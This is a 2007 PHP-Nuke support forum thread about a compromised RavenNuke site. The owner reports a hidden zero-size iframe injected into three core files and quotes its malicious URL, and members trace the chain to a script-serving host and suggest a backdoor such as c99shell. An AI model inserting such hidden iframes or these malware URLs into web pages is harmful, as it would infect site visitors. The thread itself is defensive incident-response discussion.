Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
kevinkap
Involved
Involved



Joined: Apr 22, 2006
Posts: 356

PostPosted: Tue Apr 24, 2007 8:05 pm Reply with quote

wow, I was in the middle of uploading the php-manual and my site was compromised. Three files were altered some how. Footer, header, and index.php all had an iframe tag added to the bottom of them containing this:

src='http://ayiosamvrosios.com/_tr/index.php' height=0 width=0 name='ad'>ad

This is an rn2.10 site, with sentinel 2.5.06. almost every setting is turned on. How would this be done and what is it?

Thanks Evil or Very Mad

_________________
Kevin Kappes 
View user's profile Send private message
jaded
Theme Guru



Joined: Nov 01, 2003
Posts: 1006

PostPosted: Tue Apr 24, 2007 8:11 pm Reply with quote

What addons do you have installed on this site? Was it a pure RN site to start with or an upgrade or downgrade from another version of nuke?

_________________
Themes BB Skins [ Only registered users can see links on this board! Get registered or login! ]
Graphic Tees [ Only registered users can see links on this board! Get registered or login! ]
Paranormal Tees [ Only registered users can see links on this board! Get registered or login! ]
Ghost Stories & More [ Only registered users can see links on this board! Get registered or login! ] 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Tue Apr 24, 2007 8:17 pm Reply with quote

Time to get some access logs and go searching. If your Sentinel database is still there and you have the tracking enabled, look at those logs too.

Are you using any addons with known security problems... vWar, Coppermine, etc?

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
kevinkap







PostPosted: Tue Apr 24, 2007 9:07 pm Reply with quote

It was a fresh install of rn files and an upgraded db from rn7.6.2.02.

I have g2 2.1.1 installed, ns contact plus2.4, an address list module that simply gives all members in an address list manner, Sommaire 3 from montego, gcalender 1.4.1 from gremmie, montego's approve membership lite, subscription 2.0 module from western studios. I did have to edit the header file for the subscription mod. I had to add

//remove subscribers mod
require 'modules/Subscription/includes/remove_subscr.php';

to it.

Sentinel showed the ip in the tracked db so I added it to the blocked list.

I am having my host look at the logs.

I forgot, I had uploaded php manual, php nuke how to, pear manual, nuke tools3. I believe I was in the middle of uploading the php manual when it happened based on the time stamps.
 
jakec
Site Admin



Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Wed Apr 25, 2007 5:45 am Reply with quote

If Sentinel shows the IP in tracked ip section of Sentinel, you should also be able to see what strings they were using. Also if you know roughly the date and time it should help you, or your host to find it within your logs.
 
View user's profile Send private message
kevinkap







PostPosted: Wed Apr 25, 2007 6:12 am Reply with quote

Where exactly would I look for the strings? Just in the logs?

Thanks.
 
jakec







PostPosted: Wed Apr 25, 2007 6:28 am Reply with quote

When you go into 'Display Tracked IP's' you should see on the right handside four buttons, under the title 'Functions'.
Click on the 2nd button which is called 'View'. This should open another window and display the strings the IP has used (hopefully).
 
kevinkap







PostPosted: Wed Apr 25, 2007 6:35 am Reply with quote

I had already added it to the blocked list. This is what it showed:

locked IP: 74.6.73.235
User:
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; [ Only registered users can see links on this board! Get registered or login! ]
Blocked on: 2007-04-24 22:01:21
Notes: attached site
Reason: Abuse-Admin

Query String:
Get String:
Post String:
Forwarded For: none
Client IP: none
Remote Address: 74.6.73.235
Remote Port: 33702
Request Method: GET

under the strings, it shows this
[ Only registered users can see links on this board! Get registered or login! ]

That is an image in the gallery.

Doesn't tell me much really.
 
evaders99







PostPosted: Wed Apr 25, 2007 1:29 pm Reply with quote

That's it? Looks like its just Yahoo's search bot. While there are some reports that it is theoretically possible to cause such an attack to come from search engines, I've not actually seen one.

That doesn't look like one you want.
 
fkelly
Former Moderator in Good Standing



Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Wed Apr 25, 2007 6:07 pm Reply with quote

I agree with Evaders. That string you posted looks like a standard Gallery link. I'd try to find the IP of ayiosamvrosios.com and look in your log for similar ips. Do you have direct access to the log? A lot of these attacks come from similar IP's like 87.* or 83.* and if you search your log for these you can narrow it down considerably. I'd find out what the first two digits of ayiosamvrosios.com are and try searching for IPs with their first two digits in your log.

Also, I'd check my directories for any strange new files or any standard ones that have been altered.
 
View user's profile Send private message Visit poster's website
hitwalker
Sells PC To Pay For Divorce



Joined:
Posts: 5661

PostPosted: Thu Apr 26, 2007 4:11 pm Reply with quote

ok it was a bit of a search but the address
Code:
http://ayiosamvrosios.com/_tr/index.php


is pulling an iframe from here..
Code:
http://z72496.infobox.ru/index.php

calling a java-script..
explained here... [ Only registered users can see links on this board! Get registered or login! ]

i dont think sentinel has anything to do with this.
 
View user's profile Send private message
gregexp
The Mouse Is Extension Of Arm



Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol

PostPosted: Thu Apr 26, 2007 7:36 pm Reply with quote

If you dont mind me Jumping in here,

Do you allow uploads of ANYTHING on your site??

I cant think of one thing that could be used to execute a command to write to a file withing RavenNuke. Believe me when I say, I've tested every known and unknown exploit I could grab or create. Sentinel caught almost all of the known and a few of the ones I made.

But 100% of them FAILED, even Session manipulation took a dive.

Check all access logs that should be available to you in your control panel, Look for accesses that match NOTHING on your site.

For example, accesses like [ Only registered users can see links on this board! Get registered or login! ]

If you pulled it, see if there is a 404 error at the same time it was accessed(error logs).

It is my belief that you were backed doored, with something like a c99shell script.

Real problem is that I converted file types and hacked it enough to where I could upload it, but I had to hack it so much that the server would not allow execution in order to properly use such a script.

I hope that you find what you are looking for, and Im sure that this is a backdoor issue and not an exploit of RN.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©